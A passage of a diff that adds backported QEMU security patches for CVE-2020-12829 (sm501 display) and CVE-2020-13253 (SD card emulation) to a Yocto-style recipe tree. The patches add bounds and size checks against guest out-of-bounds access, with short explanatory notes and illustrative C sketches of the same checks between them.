+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 97660090bb..5ed57703d8 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+
+ static void sm501_2d_operation(SM501State *s)
+ {
+- /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & BIT(27);
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
+- uint32_t color = s->twoD_foreground;
+ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ int dst_y = s->twoD_destination & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+-
+- /* get frame buffer info */
+- uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s)
+
+ switch (cmd) {
+ case 0x00: /* copy area */
++ {
++ int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ int src_y = s->twoD_source & 0xFFFF;
++ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ uint8_t *src = s->local_mem + src_base;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+ for (y = 0; y < height; y++) { \
+@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ case 0x01: /* fill rectangle */
++ {
++ uint32_t color = s->twoD_foreground;
++
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+ for (y = 0; y < height; y++) { \
+@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+ cmd);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
new file mode 100644
index 0000000000..ab09e8b039
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
@@ -0,0 +1,266 @@
+From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman
+ where possible
+
+Besides being faster this should also prevent malicious guests to
+abuse 2D engine to overwrite data or cause a crash.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 207 ++++++++++++++++++++++++++-------------------
+ 1 file changed, 119 insertions(+), 88 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 5ed57703d8..8bf4d111f4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
++ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ unsigned int dst_y = s->twoD_destination & 0xFFFF;
++ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ unsigned int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+- uint8_t *dst = s->local_mem + dst_base;
+- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
++ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- if (rop_mode == 0) {
+- if (rop != 0xcc) {
+- /* Anything other than plain copies are not supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not "
+- "supported.\n", rop);
+- }
+- } else {
+- if (rop2_source_is_pattern && rop != 0x5) {
+- /* For pattern source, we support only inverse dest */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and "
+- "rop %x is not supported.\n", rop);
+- } else {
+- if (rop != 0x5 && rop != 0xc) {
+- /* Anything other than plain copies or inverse dest is not
+- * supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not "
+- "supported.\n", rop);
+- }
+- }
+- }
+-
+ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+
++ if (!dst_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n");
++ return;
++ }
++
++ if (!width || !height) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n");
++ return;
++ }
++
++ if (rtl) {
++ dst_x -= width - 1;
++ dst_y -= height - 1;
++ }
++
++ if (dst_base >= get_local_mem_size(s) || dst_base +
++ (dst_x + width + (dst_y + height) * (dst_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n");
++ return;
++ }
++
+ switch (cmd) {
+- case 0x00: /* copy area */
++ case 0: /* BitBlt */
+ {
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
++ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ unsigned int src_y = s->twoD_source & 0xFFFF;
+ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
+- uint8_t *src = s->local_mem + src_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+-
+-#define COPY_AREA(_bpp, _pixel_type, rtl) { \
+- int y, x, index_d, index_s; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- _pixel_type val; \
+- \
+- if (rtl) { \
+- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+- } else { \
+- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- } \
+- if (rop_mode == 1 && rop == 5) { \
+- /* Invert dest */ \
+- val = ~*(_pixel_type *)&dst[index_d]; \
+- } else { \
+- val = *(_pixel_type *)&src[index_s]; \
+- } \
+- *(_pixel_type *)&dst[index_d] = val; \
+- } \
+- } \
+- }
+- switch (format) {
+- case 0:
+- COPY_AREA(1, uint8_t, rtl);
+- break;
+- case 1:
+- COPY_AREA(2, uint16_t, rtl);
+- break;
+- case 2:
+- COPY_AREA(4, uint32_t, rtl);
+- break;
++ unsigned int src_pitch = s->twoD_pitch & 0x1FFF;
++
++ if (!src_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n");
++ return;
++ }
++
++ if (rtl) {
++ src_x -= width - 1;
++ src_y -= height - 1;
++ }
++
++ if (src_base >= get_local_mem_size(s) || src_base +
++ (src_x + width + (src_y + height) * (src_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "sm501: 2D op src is outside vram.\n");
++ return;
++ }
++
++ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) {
++ /* Invert dest, is there a way to do this with pixman? */
++ unsigned int x, y, i;
++ uint8_t *d = s->local_mem + dst_base;
++
++ for (y = 0; y < height; y++) {
++ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format);
++ for (x = 0; x < width; x++, i += (1 << format)) {
++ switch (format) {
++ case 0:
++ d[i] = ~d[i];
++ break;
++ case 1:
++ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i];
++ break;
++ case 2:
++ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i];
++ break;
++ }
++ }
++ }
++ } else {
++ /* Do copy src for unimplemented ops, better than unpainted area */
++ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) ||
++ (!rop_mode && rop != 0xcc)) {
++ qemu_log_mask(LOG_UNIMP,
++ "sm501: rop%d op %x%s not implemented\n",
++ (rop_mode ? 2 : 3), rop,
++ (rop2_source_is_pattern ?
++ " with pattern source" : ""));
++ }
++ /* Check for overlaps, this could be made more exact */
++ uint32_t sb, se, db, de;
++ sb = src_base + src_x + src_y * (width + src_pitch);
++ se = sb + width + height * (width + src_pitch);
++ db = dst_base + dst_x + dst_y * (width + dst_pitch);
++ de = db + width + height * (width + dst_pitch);
++ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) {
++ /* regions may overlap: copy via temporary */
++ int llb = width * (1 << format);
++ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t));
++ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) *
++ height);
++ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp,
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ tmp_stride, 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, 0, 0, width, height);
++ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base],
++ tmp_stride,
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ 0, 0, dst_x, dst_y, width, height);
++ g_free(tmp);
++ } else {
++ pixman_blt((uint32_t *)&s->local_mem[src_base],
++ (uint32_t *)&s->local_mem[dst_base],
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, dst_x, dst_y, width, height);
++ }
+ }
+ break;
+ }
+- case 0x01: /* fill rectangle */
++ case 1: /* Rectangle Fill */
+ {
+ uint32_t color = s->twoD_foreground;
+
+-#define FILL_RECT(_bpp, _pixel_type) { \
+- int y, x; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+- } \
+- } \
+- }
+-
+- switch (format) {
+- case 0:
+- FILL_RECT(1, uint8_t);
+- break;
+- case 1:
+- color = cpu_to_le16(color);
+- FILL_RECT(2, uint16_t);
+- break;
+- case 2:
++ if (format == 2) {
+ color = cpu_to_le32(color);
+- FILL_RECT(4, uint32_t);
+- break;
++ } else if (format == 1) {
++ color = cpu_to_le16(color);
+ }
++
++ pixman_fill((uint32_t *)&s->local_mem[dst_base],
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), dst_x, dst_y, width, height, color);
+ break;
+ }
+ default:
+--
+2.25.1
+
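Beyond switching to pixman, the core hardening in this series is validating guest-programmed geometry against video memory before any copy or fill. A simplified, standalone version of that destination check follows; all names and the exact extent formula are illustrative, not the sm501 code itself.

    #include <stdbool.h>
    #include <stdint.h>

    /* Return true only if a dst_pitch-strided width x height rectangle at
     * (dst_x, dst_y), based at dst_base, stays inside vram_size bytes. */
    static bool dst_rect_in_vram(uint64_t dst_base,
                                 unsigned dst_x, unsigned dst_y,
                                 unsigned width, unsigned height,
                                 unsigned dst_pitch, unsigned bpp,
                                 uint64_t vram_size)
    {
        if (width == 0 || height == 0 || dst_pitch == 0) {
            return false;   /* zero-size ops are rejected, as in the patch */
        }
        /* last byte the operation may touch, computed in 64 bit */
        uint64_t end = dst_base +
            ((uint64_t)(dst_y + height - 1) * dst_pitch + dst_x + width) * bpp;
        return dst_base < vram_size && end <= vram_size;
    }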
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
new file mode 100644
index 0000000000..7f8383987c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
@@ -0,0 +1,50 @@
+From 6dd3a164f5b31c703c7d8372841ad3bd6a57de6d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 5 Jun 2018 22:28:51 -0300
+Subject: [PATCH 1/1] hw/sd/sdcard: Simplify realize() a bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+We don't need to check if sd->blk is set twice.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-18-f4bug@amsat.org>
+
+Upstream-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=6dd3a164f5b31c703c7d8372841ad3bd6a57de6d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 1cc16bf..edd60a0 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -2105,12 +2105,12 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ return;
+ }
+
+- if (sd->blk && blk_is_read_only(sd->blk)) {
+- error_setg(errp, "Cannot use read-only drive as SD card");
+- return;
+- }
+-
+ if (sd->blk) {
++ if (blk_is_read_only(sd->blk)) {
++ error_setg(errp, "Cannot use read-only drive as SD card");
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
new file mode 100644
index 0000000000..53145d059f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
@@ -0,0 +1,112 @@
+From a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 7 Jul 2020 13:02:34 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not allow invalid SD card sizes
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+QEMU allows to create SD card with unrealistic sizes. This could
+work, but some guests (at least Linux) consider sizes that are not
+a power of 2 as a firmware bug and fix the card size to the next
+power of 2.
+
+While the possibility to use small SD card images has been seen as
+a feature, it became a bug with CVE-2020-13253, where the guest is
+able to do OOB read/write accesses past the image size end.
+
+In a pair of commits we will fix CVE-2020-13253 as:
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ WP_VIOLATION errors are not modified: the error bit is set, we
+ stay in receive-data state, wait for a stop command. All further
+ data transfer is ignored. See the check on sd->card_status at the
+ beginning of sd_read_data() and sd_write_data().
+
+While this is the correct behavior, in case QEMU create smaller SD
+cards, guests still try to access past the image size end, and QEMU
+considers this is an invalid address, thus "all further data transfer
+is ignored". This is wrong and make the guest looping until
+eventually timeouts.
+
+Fix by not allowing invalid SD card sizes (suggesting the expected
+size as a hint):
+
+ $ qemu-system-arm -M orangepi-pc -drive file=rootfs.ext2,if=sd,format=raw
+ qemu-system-arm: Invalid SD card size: 60 MiB
+ SD card size has to be a power of 2, e.g. 64 MiB.
+ You can resize disk images with 'qemu-img resize <imagefile> <new-size>'
+ (note that this will lose data if you make the image smaller than it currently is).
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Message-Id: <20200713183209.26308-8-f4bug@amsat.org>
+
+Upstream-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 25 +++++++++++++++++++++++++
+ 1 file changed, 25 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index edd60a09c0..76d68359a4 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -32,6 +32,7 @@
+
+ #include "qemu/osdep.h"
+ #include "qemu/units.h"
++#include "qemu/cutils.h"
+ #include "hw/irq.h"
+ #include "hw/registerfields.h"
+ #include "sysemu/block-backend.h"
+@@ -2106,11 +2107,35 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ }
+
+ if (sd->blk) {
++ int64_t blk_size;
++
+ if (blk_is_read_only(sd->blk)) {
+ error_setg(errp, "Cannot use read-only drive as SD card");
+ return;
+ }
+
++ blk_size = blk_getlength(sd->blk);
++ if (blk_size > 0 && !is_power_of_2(blk_size)) {
++ int64_t blk_size_aligned = pow2ceil(blk_size);
++ char *blk_size_str;
++
++ blk_size_str = size_to_str(blk_size);
++ error_setg(errp, "Invalid SD card size: %s", blk_size_str);
++ g_free(blk_size_str);
++
++ blk_size_str = size_to_str(blk_size_aligned);
++ error_append_hint(errp,
++ "SD card size has to be a power of 2, e.g. %s.\n"
++ "You can resize disk images with"
++ " 'qemu-img resize <imagefile> <new-size>'\n"
++ "(note that this will lose data if you make the"
++ " image smaller than it currently is).\n",
++ blk_size_str);
++ g_free(blk_size_str);
++
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+2.32.0
+
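The size validation above uses QEMU's is_power_of_2() and pow2ceil() helpers. A self-contained equivalent of the same check, for illustration only, with the 60 MiB image from the commit message as input:

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    static bool is_pow2(uint64_t v)
    {
        return v != 0 && (v & (v - 1)) == 0;
    }

    static uint64_t next_pow2(uint64_t v)     /* smallest power of 2 >= v */
    {
        uint64_t p = 1;
        while (p < v) {
            p <<= 1;
        }
        return p;
    }

    int main(void)
    {
        uint64_t size = 60 * 1024 * 1024;     /* the 60 MiB example image */
        if (!is_pow2(size)) {
            fprintf(stderr, "Invalid SD card size: %llu MiB; use e.g. %llu MiB\n",
                    (unsigned long long)(size >> 20),
                    (unsigned long long)(next_pow2(size) >> 20));
            return 1;
        }
        return 0;
    }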
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
new file mode 100644
index 0000000000..b512b2bd7f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
@@ -0,0 +1,86 @@
+From 794d68de2f021a6d3874df41d6bbe8590ec05207 Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Mon, 13 Jul 2020 09:27:35 +0200
+Subject: [PATCH] hw/sd/sdcard: Update coding style to make checkpatch.pl happy
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+To make the next commit easier to review, clean this code first.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200630133912.9428-3-f4bug@amsat.org>
+
+Upstream-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=794d68de2f021a6d3874df41d6bbe8590ec05207
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+--- a/hw/sd/sd.c (revision b0ca999a43a22b38158a222233d3f5881648bb4f)
++++ b/hw/sd/sd.c (date 1647514442924)
+@@ -1154,8 +1154,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1170,8 +1171,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1216,12 +1218,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default:
+@@ -1240,12 +1245,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default:
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
new file mode 100644
index 0000000000..6b4c1ec050
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
@@ -0,0 +1,139 @@
+From 790762e5487114341cccc5bffcec4cb3c022c3cd Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Thu, 4 Jun 2020 19:22:29 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not switch to ReceivingData if address is
+ invalid
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Only move the state machine to ReceivingData if there is no
+pending error. This avoids later OOB access while processing
+commands queued.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.3 Data Read
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ 4.3.4 Data Write
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+WP_VIOLATION errors are not modified: the error bit is set, we
+stay in receive-data state, wait for a stop command. All further
+data transfer is ignored. See the check on sd->card_status at the
+beginning of sd_read_data() and sd_write_data().
+
+Fixes: CVE-2020-13253
+
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1880822
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-6-f4bug@amsat.org>
+
+Upstream-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=790762e5487114341cccc5bffcec4cb3c022c3cd
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 38 ++++++++++++++++++++++++--------------
+ 1 file changed, 24 insertions(+), 14 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index f4f76f8fd2..fad9cf1ee7 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -1171,13 +1171,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 17: /* CMD17: READ_SINGLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
+@@ -1188,13 +1190,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 18: /* CMD18: READ_MULTIPLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
+@@ -1234,14 +1238,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+@@ -1261,14 +1268,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+--
+2.32.0
+
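The essential ordering fix here is "validate the guest-supplied address first, change state only afterwards", so a rejected command never enters a data-transfer phase. A minimal sketch of that pattern with made-up types and constants, not the actual QEMU SD model:

    #include <stdint.h>

    #define ADDRESS_ERROR (1u << 30)

    enum card_state { ST_TRANSFER, ST_SENDING_DATA };

    struct card {
        enum card_state state;
        uint64_t size;          /* card capacity in bytes */
        uint32_t blk_len;
        uint32_t status;
        uint64_t data_start;
        uint32_t data_offset;
    };

    /* CMD17-style read setup: reject out-of-range addresses before
     * entering the data-sending state, so no transfer is ever started. */
    static int cmd_read_single_block(struct card *c, uint64_t addr)
    {
        if (addr + c->blk_len > c->size) {
            c->status |= ADDRESS_ERROR;
            return -1;          /* command rejected, state unchanged */
        }
        c->state = ST_SENDING_DATA;
        c->data_start = addr;
        c->data_offset = 0;
        return 0;
    }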
